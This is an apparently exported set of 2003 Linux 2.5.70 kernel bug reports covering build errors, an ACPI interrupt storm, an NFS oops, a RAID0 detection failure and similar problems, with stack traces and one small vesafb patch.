    <t>Distribution: RH 7.3 Hardware Environment: 8-way PIII-700, 12GB ram Software Environment: RH7.3, gcc 2.96 Problem Description: CC kernel/ksyms.o kernel/ksyms.c:490: `__preempt_spin_lock' undeclared here (not in a function) kernel/ksyms.c:490: initializer element is not constant kernel/ksyms.c:490: (near initialization for `__ksymtab___preempt_spin_lock.value') kernel/ksyms.c:491: `__preempt_write_lock' undeclared here (not in a function) kernel/ksyms.c:491: initializer element is not constant kernel/ksyms.c:491: (near initialization for `__ksymtab___preempt_write_lock.value') make[1]: *** [kernel/ksyms.o] Error 1 make: *** [kernel] Error 2 Steps to reproduce: Compile 2.5.70-mm4 with CONFIG_SMP, CONFIG_PREEMPT, and CONFIG_DEBUG_EVENTLOG turned on. It looks like this got broken in /include/linux/spinlock.h: #if defined(CONFIG_SMP) &amp;&amp; defined(CONFIG_PREEMPT) &amp;&amp; !defined(CONFIG_DEBUG_EVENTLOG) void __preempt_spin_lock(spinlock_t *lock); void __preempt_write_lock(rwlock_t *lock); ...</t>
  </si>
  <si>
    <t>ACPI SCI interrupt storm on Tyan Tiger MB in APIC mode</t>
  </si>
  <si>
    <t>2.5.70 (earlier versions as well)</t>
  </si>
  <si>
    <t>2003-06-04 10:40 UTC</t>
  </si>
  <si>
    <t>Udo A. Steinberg</t>
  </si>
  <si>
    <t>2004-04-12 21:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.0 Hardware Environment: Tyan Tiger S2723GNN mainboard, 1 GB RAM, two Xeon 2.66 GHz CPU with Hyperthreading, Bios Version 1.02 (newest) Software Environment: Unmodified monolithic 2.5.70 Linux kernel, booted with Lilo 22.5 Problem Description: During ACPI initialization I get 100 times the following output: ACPI: Subsystem revision 20030522 irq 9: nobody cared! Call Trace: [&lt;c010b4a2&gt;] handle_IRQ_event+0x87/0xf7 [&lt;c010b758&gt;] do_IRQ+0xbe/0x17b [&lt;c0109b78&gt;] common_interrupt+0x18/0x20 [&lt;c010be45&gt;] setup_irq+0xc3/0xff [&lt;c022bb36&gt;] acpi_irq+0x0/0x16 [&lt;c022bb36&gt;] acpi_irq+0x0/0x16 [&lt;c010b8be&gt;] request_irq+0xa9/0xde [&lt;c022bb86&gt;] acpi_os_install_interrupt_handler+0x3a/0x59 [&lt;c022bb36&gt;] acpi_irq+0x0/0x16 [&lt;c022bb36&gt;] acpi_irq+0x0/0x16 [&lt;c022fb49&gt;] acpi_ev_install_sci_handler+0x1a/0x1e [&lt;c022fb0c&gt;] acpi_ev_sci_xrupt_handler+0x0/0x18 [&lt;c022f58b&gt;] acpi_ev_handler_initialize+0x6/0x6e [&lt;c024056e&gt;] acpi_enable_subsystem+0x2b/0x58 [&lt;c03e964c&gt;] acpi_bus_init+0x7a/0x115 [&lt;c03e973d&gt;] acpi_init+0x56/0xa6 [&lt;c03d685a&gt;] do_initcalls+0x28/0x94 [&lt;c0130660&gt;] init_workqueues+0xf/0x26 [&lt;c01050c9&gt;] init+0x5a/0x1d1 [&lt;c010506f&gt;] init+0x0/0x1d1 [&lt;c0107075&gt;] kernel_thread_helper+0x5/0xb handlers: [&lt;c022bb36&gt;] (acpi_irq+0x0/0x16) Additionally the number of ACPI interrupts is excessive, nearly 4.5 million ACPI interrupts per minute. The machine does not have this problem when running 2.4.21-rc7, where the ACPI interrupt is configured in XT-PIC mode, whereas 2.5.70 configures it to operate in IO-APIC-level mode. robert.moore@intel.com says it may be due to a missing interrupt source override for the ACPI SCI interrupt. The ACPI backport in 2.4.21-ac seems to have a similar problem (see Bug #370) Steps to reproduce: Run 2.5.70 on aforementioned board. Alternatively send me patches to try or ask me for additional information.</t>
  </si>
  <si>
    <t>NUMA scheduler hang</t>
  </si>
  <si>
    <t>2.5.70-mm3</t>
  </si>
  <si>
    <t>2003-06-04 15:28 UTC</t>
  </si>
  <si>
    <t>2003-06-24 11:32 UTC</t>
  </si>
  <si>
    <t>Rick Lindsley</t>
  </si>
  <si>
    <t>Seem to have a bunch of processes wedged doing balance on exec migration. See attatchment coming up in a sec. Hopefully Rick can take a look at this ...</t>
  </si>
  <si>
    <t>vesafb fails to initalize 1GB system memory and 128MB video memory</t>
  </si>
  <si>
    <t>2.5.63 - Current</t>
  </si>
  <si>
    <t>2003-06-05 02:57 UTC</t>
  </si>
  <si>
    <t>Christopher Rude</t>
  </si>
  <si>
    <t>2003-10-04 14:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 profile w/ ARCH=~x86 Hardware Environment: 2xAthlon MP 1900+,Tyan 2462 (AMD 760MP), 1GB memory, VisionTek Gforce 4 Ti4600(128 MB) Software Environment: GCC 3.2.3, Glibc 2.3.2 Problem Description: trying to use vesafb, and get blank screen (system boots normaly w/ exception of no frambuffer) has something to do with failing to allopcate memory (ioremap i belive) this had been present in 2.4 series as well, untill recently (at least in the ac sources, and gentoo-sources) Steps to reproduce: install 1GB of memory, and use a video card w/ 128MB memory and try to use frambuffered console (I have seen behaviour on more than just my card. I have ported the patch that I had used in the 2.4 series (before gentoo and ac picked it up) please be kind as I am relativly new to this, and I hope this helps (btw I have been using this patch since 2.5.63, w/ slight change at 2.5.67, on linus's kernel and on the mm tree, and have had no troubles) ______________________________________________ diff -Naur linux-2.5.67/drivers/video/vesafb.c linux-2.5.67-postpatch/drivers/video/vesafb.c --- linux-2.5.67/drivers/video/vesafb.c 2003-04-16 13:29:54.000000000 -0500 +++ linux-2.5.67-postpatch/drivers/video/vesafb.c 2003-04-09 14:52:46.000000000 -0500 @@ -225,7 +225,7 @@ vesafb_defined.xres = screen_info.lfb_width; vesafb_defined.yres = screen_info.lfb_height; vesafb_fix.line_length = screen_info.lfb_linelength; - vesafb_fix.smem_len = screen_info.lfb_size * 65536; + vesafb_fix.smem_len = screen_info.lfb_width * screen_info.lfb_height * vesafb_defined.bits_per_pixel / 8; vesafb_fix.visual = (vesafb_defined.bits_per_pixel == 8) ? FB_VISUAL_PSEUDOCOLOR : FB_VISUAL_TRUECOLOR; ________________________________________________ please let me know what I can do better to make this easier on you.... Thanks for all your hard work, the 2.6 kernel is going to turn a lot of heads, been nothing but impressed with the developmental branch</t>
  </si>
  <si>
    <t>2003-06-05 12:24 UTC</t>
  </si>
  <si>
    <t>2003-06-17 08:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: IBM x440 Software Environment: 2.5.70 Problem Description: conflicting assumptions on apicmask vs cpumask for interrupt destinations, wli to clean this up, I will test. Steps to reproduce: boot 2.5.70-bk check boot log for "not a valid apic mask" error messages -initial irq masks are wrong because it's expecting a cpumask, and it gets a apicmask.</t>
  </si>
  <si>
    <t>2.5.69+</t>
  </si>
  <si>
    <t>Dmitry Torokhov</t>
  </si>
  <si>
    <t>2003-06-06 09:26 UTC</t>
  </si>
  <si>
    <t>2003-06-15 13:32 UTC</t>
  </si>
  <si>
    <t>This is a reopening/relocation of Bug #475 - Cannot NFS mount from localhost. Aravind Ceyardass (aravind@rogers.com)wrote: ------------------- I am able to mount from localhost if I route the NFS RPC calls through a UDP relay. It mounts perfectly without problem. Looks like there is some timing related bug in the rpc client code. For some reason the rpc client ignores or drops the respones from the rpc server and keeps retransmitting the rpc calls. nfsstat show the getattr call being retransmitted. I checked this in 2.5.65 I think we should file a bug against the rpc code.</t>
  </si>
  <si>
    <t>NMI watchdog lockup on reboot</t>
  </si>
  <si>
    <t>2003-06-06 16:34 UTC</t>
  </si>
  <si>
    <t>2003-06-07 00:57 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES8 AMD64 Hardware Environment: Dual-proc AMD64 melody box. Software Environment: 2.5.70 Problem Description: Frequently when rebooting 2.5.70, the NMI Watchdog fires reporting the following: NMI Watchdog detected LOCKUP on CPU0, registers: CPU 0 Pid: 0, comm: swapper Not tainted RIP: 0010:[&lt;ffffffff8011bbc2&gt;] &lt;ffffffff8011bbc2&gt;{.text.lock.smp+25} RSP: 0018:ffffffff80494ac8 EFLAGS: 00000086 RAX: 0000000000000002 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000002 RSI: 0000000000000000 RDI: ffffffff8011ba00 RBP: ffffffff8010f8b0 R08: 0000000000000001 R09: 0000000000009400 R10: 0000000000000001 R11: ffffffff804951c0 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffffffff80490780(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000002a9556a000 CR3: 0000000000101000 CR4: 00000000000006a0 Call Trace: &lt;EOE&gt; &lt;IRQ&gt; &lt;ffffffff8011ba00&gt;{stop_this_cpu+0} &lt;ffffffff8011ba49&gt;{smp_send_stop+25} &lt;ffffffff80118af9&gt;{machine_restart+9} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff8011bab0&gt;{smp_call_function_interrupt+64} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff80112023&gt;{call_function_interrupt+99} &lt;EOI&gt; &lt;ffffffff801320b0&gt;{thread_return+0} &lt;ffffffff8010f8d7&gt;{default_idle+39} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff8010f972&gt;{cpu_idle+34} &lt;ffffffff804a7862&gt;{start_kernel+418} Process swapper (pid: 0, stackpage=ffffffff803d6e20) Stack: ffffffff8011ba00 0000000000000000 ffffffff00000000 0000000000000000 0000000000000001 ffffffff8011ba49 00000000fffffffd ffffffff80118af9 0000000000000000 ffffffff8010f8b0 Call Trace:&lt;IRQ&gt; &lt;ffffffff8011ba00&gt;{stop_this_cpu+0} &lt;ffffffff8011ba49&gt;{smp_send_stop+25} &lt;ffffffff80118af9&gt;{machine_restart+9} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff8011bab0&gt;{smp_call_function_interrupt+64} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff80112023&gt;{call_function_interrupt+99} &lt;EOI&gt; &lt;ffffffff801320b0&gt;{thread_return+0} &lt;ffffffff8010f8d7&gt;{default_idle+39} &lt;ffffffff8010f8b0&gt;{default_idle+0} &lt;ffffffff8010f972&gt;{cpu_idle+34} &lt;ffffffff804a7862&gt;{start_kernel+418} Code: 7e f5 e9 53 fd ff ff 66 66 66 90 66 66 66 48 83 ec 08 be e8 console shuts up ... Disabling the nmi watchdog results in a silent hang rather then the watchdog report. This problem has also been reported by Bryan O'Sullivan on discuss@x86-64.org. Steps to reproduce: 1. Boot w/ 2.5.70 2. /sbin/init 6 and repeat until it occurs.</t>
  </si>
  <si>
    <t>motorola sandpoint code does not compile</t>
  </si>
  <si>
    <t>2003-06-09 04:05 UTC</t>
  </si>
  <si>
    <t>Thomas Koeller</t>
  </si>
  <si>
    <t>2003-07-15 09:07 UTC</t>
  </si>
  <si>
    <t>Tom Rini</t>
  </si>
  <si>
    <t>Distribution: none Hardware Environment: Motorola Sandpoint X3 /w Unity/8240 MPPMC Software Environment: Cross build on Linux/x86 host using gcc-3.3 Problem Description: arch/ppc/platforms/sandpoint_setup.c does not compile because the call to openpic_init() in line #309 does not match the punction prototype as defined in include/asm-ppc/open_pic.h Steps to reproduce: Configure for Sandpoint X3 target and build.</t>
  </si>
  <si>
    <t>RAID0 stripe not detected in 2.5.70</t>
  </si>
  <si>
    <t>2.5.70-bk13</t>
  </si>
  <si>
    <t>2003-06-09 13:27 UTC</t>
  </si>
  <si>
    <t>2003-06-10 22:30 UTC</t>
  </si>
  <si>
    <t>Up until 2.5.70, my RAID0 stripe mounted fine, in both 2.4 and 2.5. It looked like this.. Here's how things look in 2.4, and in 2.5.69 md: md driver 0.90.0 MAX_MD_DEVS=256, MD_SB_DISKS=27 md: Autodetecting RAID arrays. [events: 00000154] [events: 00000154] md: autorun ... md: considering hdg1 ... md: adding hdg1 ... md: adding hde1 ... md: created md0 md: bind&lt;hde1,1&gt; md: bind&lt;hdg1,2&gt; md: running: &lt;hdg1&gt;&lt;hde1&gt; md: hdg1's event counter: 00000154 md: hde1's event counter: 00000154 md0: max total readahead window set to 1024k md0: 2 data-disks, max readahead per data-disk: 512k raid0: looking at hde1 raid0: comparing hde1(45034752) with hde1(45034752) raid0: END raid0: ==&gt; UNIQUE raid0: 1 zones raid0: looking at hdg1 raid0: comparing hdg1(45034752) with hde1(45034752) raid0: EQUAL raid0: FINAL 1 zones raid0: zone 0 raid0: checking hde1 ... contained as device 0 (45034752) is smallest!. raid0: checking hdg1 ... contained as device 1 raid0: zone-&gt;nb_dev: 2, size: 90069504 raid0: current zone offset: 45034752 raid0: done. raid0 : md_size is 90069504 blocks. raid0 : conf-&gt;smallest-&gt;size is 90069504 blocks. raid0 : nb_zone is 1. raid0 : Allocating 8 bytes for hash. md: updating md0 RAID superblock on device md: hdg1 [events: 00000155]&lt;6&gt;(write) hdg1's sb offset: 45034816 md: hde1 [events: 00000155]&lt;6&gt;(write) hde1's sb offset: 45034816 md: ... autorun DONE I tested 2.5.70-bk13, and found this happens instead... md: Autodetecting RAID arrays. md: autorun ... md: considering hdg1 ... md: adding hdg1 ... md: adding hde1 ... md: created md0 md: bind&lt;hde1&gt; md: bind&lt;hdg1&gt; md: running: &lt;hdg1&gt;&lt;hde1&gt; md0: setting max_sectors to 256, segment boundary to 65535 raid0: looking at hdg1 raid0: comparing hdg1(45034752) with hdg1(45034752) raid0: END raid0: ==&gt; UNIQUE raid0: 1 zones raid0: looking at hde1 raid0: comparing hde1(45034752) with hdg1(45034752) raid0: EQUAL raid0: FINAL 1 zones raid0: multiple devices for 1 - aborting! md: pers-&gt;run() failed ... md :do_md_run() returned -22 md: md0 stopped. md: unbind&lt;hdg1&gt; md: export_rdev(hdg1) md: unbind&lt;hde1&gt; md: export_rdev(hde1) md: ... autorun DONE. When this fails, the boot scripts get a little further, and then it oopses when something tries to mount md0 (which isn't there) Jun 8 18:55:43 tetrachloride kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000014 Jun 8 18:55:43 tetrachloride kernel: printing eip: Jun 8 18:55:43 tetrachloride kernel: c0392ec6 Jun 8 18:55:43 tetrachloride kernel: *pde = 00000000 Jun 8 18:55:43 tetrachloride kernel: Oops: 0000 [#1] Jun 8 18:55:43 tetrachloride kernel: CPU: 0 Jun 8 18:55:43 tetrachloride kernel: EIP: 0060:[&lt;c0392ec6&gt;] Not tainted Jun 8 18:55:43 tetrachloride kernel: EFLAGS: 00010202 Jun 8 18:55:43 tetrachloride kernel: EIP is at raid0_make_request+0x3f/0x169 Jun 8 18:55:43 tetrachloride kernel: eax: 00000000 ebx: 00000000 ecx: 00000000 edx: 00000000 Jun 8 18:55:43 tetrachloride kernel: esi: 00000080 edi: 00000000 ebp: cf801d50 esp: cf801d28 Jun 8 18:55:43 tetrachloride kernel: ds: 007b es: 007b ss: 0068 Jun 8 18:55:43 tetrachloride kernel: Process mount (pid: 90, threadinfo=cf800000 task=cf8fe080) Jun 8 18:55:43 tetrachloride kernel: Stack: c01652a0 c1287ee0 00000000 cf8fe080 c01210c3 00000000 00000007 cfcb5424 Jun 8 18:55:43 tetrachloride kernel: 00000001 cfb699b8 cf801da4 c02e8d26 cfb699b8 cf7eee4c cf801d5c cf478850 Jun 8 18:55:43 tetrachloride kernel: cf801d88 c016533f cf7eee4c 00000001 00000000 cf801da0 c0167a46 cffbcd30 Jun 8 18:55:43 tetrachloride kernel: Call Trace: Jun 8 18:55:43 tetrachloride kernel: [&lt;c01652a0&gt;] bh_lru_install+0x97/0xdc Jun 8 18:55:43 tetrachloride kernel: [&lt;c01210c3&gt;] autoremove_wake_function+0x0/0x4b Jun 8 18:55:43 tetrachloride kernel: [&lt;c02e8d26&gt;] generic_make_request+0x133/0x1bb Jun 8 18:55:43 tetrachloride kernel: [&lt;c016533f&gt;] __find_get_block+0x5a/0xc2 Jun 8 18:55:43 tetrachloride kernel: [&lt;c0167a46&gt;] bio_alloc+0xcc/0x197 Jun 8 18:55:43 tetrachloride kernel: [&lt;c02e8e01&gt;] submit_bio+0x53/0x96 Jun 8 18:55:43 tetrachloride kernel: [&lt;c016519f&gt;] __bread_slow+0x3c/0xa6 Jun 8 18:55:43 tetrachloride kernel: [&lt;c0165427&gt;] __bread+0x35/0x39 Jun 8 18:55:43 tetrachloride kernel: [&lt;c01c4e94&gt;] fat_fill_super+0x104/0x7d7 Jun 8 18:55:43 tetrachloride kernel: [&lt;c0147f03&gt;] check_poison_obj+0x3e/0x199 Jun 8 18:55:43 tetrachloride kernel: [&lt;c025e822&gt;] snprintf+0x26/0x2a Jun 8 18:55:43 tetrachloride kernel: [&lt;c019a12b&gt;] disk_name+0x9f/0xa1 Jun 8 18:55:43 tetrachloride kernel: [&lt;c01c9191&gt;] vfat_fill_super+0x32/0x61 Jun 8 18:55:43 tetrachloride kernel: [&lt;c016a271&gt;] get_sb_bdev+0x118/0x14b Jun 8 18:55:43 tetrachloride kernel: [&lt;c0181a84&gt;] alloc_vfsmnt+0x88/0xbc Jun 8 18:55:43 tetrachloride kernel: [&lt;c01c91ee&gt;] vfat_get_sb+0x2e/0x34 Jun 8 18:55:43 tetrachloride kernel: [&lt;c01c915f&gt;] vfat_fill_super+0x0/0x61 Jun 8 18:55:43 tetrachloride kernel: [&lt;c016a48e&gt;] do_kern_mount+0x56/0xc3 Jun 8 18:55:43 tetrachloride kernel: [&lt;c0183136&gt;] do_add_mount+0x7d/0x17a Jun 8 18:55:43 tetrachloride kernel: [&lt;c0183421&gt;] do_mount+0x11d/0x160 Jun 8 18:55:43 tetrachloride kernel: [&lt;c01832ff&gt;] copy_mount_options+0xcc/0xd1 Jun 8 18:55:43 tetrachloride kernel: [&lt;c0183b12&gt;] sys_mount+0xcc/0x180 Jun 8 18:55:43 tetrachloride kernel: [&lt;c01096df&gt;] syscall_call+0x7/0xb Jun 8 18:55:43 tetrachloride kernel: Jun 8 18:55:43 tetrachloride kernel: Code: 8b 4f 14 89 d8 31 d2 d3 e8 f7 77 10 8b 17 8b 3c 82 8b 17 89</t>
  </si>
  <si>
    <t>Kernel Oops with nfsd.</t>
  </si>
  <si>
    <t>JFS</t>
  </si>
  <si>
    <t>2003-06-10 09:21 UTC</t>
  </si>
  <si>
    <t>2003-09-19 08:45 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: ------ |Server| ------ # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 10 model name : Pentium III (Cascades) stepping : 1 cpu MHz : 702.199 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1384.44 # cat /proc/meminfo MemTotal: 4325580 kB MemFree: 3239332 kB Buffers: 615592 kB Cached: 316972 kB SwapCached: 0 kB Active: 95640 kB Inactive: 852508 kB HighTotal: 3465188 kB HighFree: 3129856 kB LowTotal: 860392 kB LowFree: 109476 kB SwapTotal: 2097136 kB SwapFree: 2097136 kB Dirty: 1868 kB Writeback: 0 kB Mapped: 21368 kB Slab: 59364 kB Committed_AS: 31852 kB PageTables: 452 kB VmallocTotal: 114680 kB VmallocUsed: 2240 kB VmallocChunk: 112440 kB # df -h Filesystem Size Used Avail Use% Mounted on /dev/sda3 25G 4.5G 19G 19% / /dev/sda1 23M 11M 10M 50% /boot /dev/sdb1 33G 642M 31G 2% /nfsserver/ext3 /dev/sdc1 34G 96M 33G 1% /nfsserver/jfs /dev/sdd1 34G 245M 33G 1% /nfsserver/reiserfs # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:06:29:F6:3D:E6 inet addr:9.3.192.6 Bcast:9.3.192.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:201340 errors:0 dropped:0 overruns:0 frame:0 TX packets:6874 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:135857677 (129.5 Mb) TX bytes:639480 (624.4 Kb) Interrupt:11 Base address:0x2200 ------- |Client1| ------- # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 10 cpu MHz : 864.111 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1708.03 # cat /proc/meminfo MemTotal: 252752 kB MemFree: 3384 kB Buffers: 20132 kB Cached: 200284 kB SwapCached: 0 kB Active: 101644 kB Inactive: 123984 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 252752 kB LowFree: 3384 kB SwapTotal: 530104 kB SwapFree: 530100 kB Dirty: 0 kB Writeback: 0 kB Mapped: 8904 kB Slab: 21400 kB Committed_AS: 19764 kB PageTables: 284 kB VmallocTotal: 778168 kB VmallocUsed: 928 kB VmallocChunk: 777240 kB HugePages_Total: 0 HugePages_Free: 0 Hugepagesize: 4096 kB # df -h Filesystem Size Used Avail Use% Mounted on /dev/hda2 27G 3.7G 22G 15% / # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:02:55:2A:F2:CC inet addr:9.3.192.48 Bcast:9.3.192.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:204155 errors:0 dropped:0 overruns:0 frame:0 TX packets:5563 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:136761161 (130.4 Mb) TX bytes:429949 (419.8 Kb) Interrupt:20 Base address:0x74c0 Memory:febff000-febff038 ------- |Client2| ------- # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 10 cpu MHz : 864.111 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1708.03 # cat /proc/meminfo MemTotal: 252744 kB MemFree: 179880 kB Buffers: 3244 kB Cached: 54900 kB SwapCached: 0 kB Active: 21116 kB Inactive: 41748 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 252744 kB LowFree: 179880 kB SwapTotal: 530136 kB SwapFree: 530136 kB Dirty: 16 kB Writeback: 0 kB Mapped: 8324 kB Slab: 7592 kB Committed_AS: 19188 kB PageTables: 260 kB VmallocTotal: 778204 kB VmallocUsed: 1264 kB VmallocChunk: 776940 kB # df -h Filesystem Size Used Avail Use% Mounted on /dev/hda2 3.8G 3.0G 702M 82% / /dev/hda1 99M 8.5M 85M 10% /boot # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:02:55:2A:F9:21 inet addr:9.3.192.50 Bcast:9.3.192.255 Mask:255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10439 errors:0 dropped:0 overruns:0 frame:0 TX packets:2117 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:7628067 (7.2 Mb) TX bytes:188451 (184.0 Kb) Interrupt:5 Base address:0x78c0 Memory:febff000-febff038 Software Environment: ------ |Server| ------ Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11n module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 3.1.5 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 No Modules Loaded ------- |Client1| ------- Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11z mount 2.11z module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 3.1.5 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 No Modules Loaded ------- |Client2| ------- Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11n module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 No Modules Loaded Problem Description: While running an intensive NFS test (see http://ltp.sf.net/nfs) I was able to create the following kernel oops on the server: ------------------------------------ Code: Bad EIP value. &lt;1&gt;Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 36d49001 Oops: 0000 [#55] CPU: 0 EIP: 0060:[&lt;00000000&gt;] Not tainted EFLAGS: 00010202 EIP is at 0x0 eax: 00000000 ebx: ebc6c628 ecx: 00000000 edx: f7d4fc8c esi: f747b98c edi: 00007734 ebp: f383fc28 esp: f383fc14 ds: 007b es: 007b ss: 0068 Process nfsd (pid: 1709, threadinfo=f383e000 task=f38530c0) Stack: c01d2bc2 ebc6c628 00000001 f383fea4 f747b98c f383fc3c c01d2c2e f747b98c 00030060 00007734 f383fe80 c01d1ddf f747b98c f389d158 00000001 f383fea4 11270000 f383fd8c 00000000 c03ff704 f383fe4c 00000000 00000247 c0574728 Call Trace: [&lt;c01d2bc2&gt;] export_iget+0x3e/0x94 [&lt;c01d2c2e&gt;] get_object+0x16/0x1c [&lt;c01d1ddf&gt;] find_exported_dentry+0x3f/0xc90 [&lt;c03ff704&gt;] ip_generic_getfrag+0x0/0x8c [&lt;c041f290&gt;] udp_sendmsg+0xaa8/0xb48 [&lt;c03e7183&gt;] sock_alloc_send_skb+0x1b/0x24 [&lt;c03ffa23&gt;] ip_append_data+0x293/0x660 [&lt;c041f136&gt;] udp_sendmsg+0x94e/0xb48 [&lt;c03ff704&gt;] ip_generic_getfrag+0x0/0x8c [&lt;c041f290&gt;] udp_sendmsg+0xaa8/0xb48 [&lt;c04272e8&gt;] inet_sendmsg+0x40/0x48 [&lt;c03e41e6&gt;] sock_sendmsg+0x86/0xa4 [&lt;c04272e8&gt;] inet_sendmsg+0x40/0x48 [&lt;c011591d&gt;] kmap+0x2d/0x34 [&lt;c03e7551&gt;] sock_no_sendpage+0x71/0x90 [&lt;c03e7562&gt;] sock_no_sendpage+0x82/0x90 [&lt;c01d9d18&gt;] exp_find_key+0x4c/0x5c [&lt;c01d2e0e&gt;] export_decode_fh+0x66/0x6f [&lt;c01d4f30&gt;] nfsd_acceptable+0x0/0x1ac [&lt;c01d5426&gt;] fh_verify+0x34a/0x4f0 [&lt;c01d4f30&gt;] nfsd_acceptable+0x0/0x1ac [&lt;c01d6874&gt;] nfsd_access+0x28/0xf4 [&lt;c01dd489&gt;] nfsd3_proc_access+0xc1/0xd0 [&lt;c01d3532&gt;] nfsd_dispatch+0xde/0x19c [&lt;c044a79d&gt;] svc_process+0x3d9/0x66c [&lt;c01d321e&gt;] nfsd+0x24e/0x484 [&lt;c01d2fd0&gt;] nfsd+0x0/0x484 [&lt;c0108c51&gt;] kernel_thread_helper+0x5/0xc ------------------------------------ Steps to reproduce: See test plan located at http://ltp.sf.net/nfs</t>
  </si>
  <si>
    <t>bug in module parameters causes an oops</t>
  </si>
  <si>
    <t>2.5.70+bk</t>
  </si>
  <si>
    <t>2003-06-11 06:29 UTC</t>
  </si>
  <si>
    <t>Alex Riesen</t>
  </si>
  <si>
    <t>2003-06-12 23:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo, module-init-tools-0.9.11 As mozilla(flashplugin) tried to initialize sound, I got the following oops, and the all subsequent calls to modprobe have hanged. modprobe: FATAL: Module snd_card_0 not found. snd: Unknown parameter `device_mode' Unable to handle kernel paging request at virtual address dc949a3c printing eip: c014911e *pde = 014fa067 *pte = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c014911e&gt;] Not tainted EFLAGS: 00010286 EIP is at load_module+0x71e/0x8b0 eax: 00000009 ebx: dc8b0000 ecx: dc949960 edx: db53eb20 esi: fffffffe edi: dc949960 ebp: d4777f8c esp: d4777f0c ds: 007b es: 007b ss: 0068 Process modprobe (pid: 4652, threadinfo=d4776000 task=d5d4dba0) Stack: dc93e000 dc93e000 dc949a60 00000002 dc8b9090 0000001f dc947a94 00000000 00000528 00000500 dc867000 dc949960 00000000 00000000 00000000 00000000 0000000c 0000001b 00000019 00000013 00000015 00000000 00000020 0000001f Call Trace: [&lt;c014934b&gt;] sys_init_module+0x9b/0x3e0 [&lt;c010a4bb&gt;] syscall_call+0x7/0xb Code: 8b b9 dc 00 00 00 85 ff 0f 84 04 fc ff ff 0f 0b 61 01 fd 0a modprobe: FATAL: Module snd_card_0 not found. [&lt;dc903ed8&gt;] rpciod_idle+0x18/0x20 [sunrpc] [&lt;dc8e8bb0&gt;] rpciod+0x0/0x3c0 [sunrpc] [&lt;c01075fd&gt;] kernel_thread_helper+0x5/0x18 [&lt;dc903ee0&gt;] rpciod_killer+0x0/0x20 [sunrpc] modprobe D DBFDAD20 4272061968 4656 4655 (NOTLB) Call Trace: [&lt;c018a0ac&gt;] real_lookup+0xdc/0x110 [&lt;c0196470&gt;] dput+0x30/0x650 [&lt;c01084b3&gt;] __down+0x143/0x350 [&lt;c018b1bd&gt;] link_path_walk+0x86d/0xda0 [&lt;c0121c50&gt;] default_wake_function+0x0/0x30 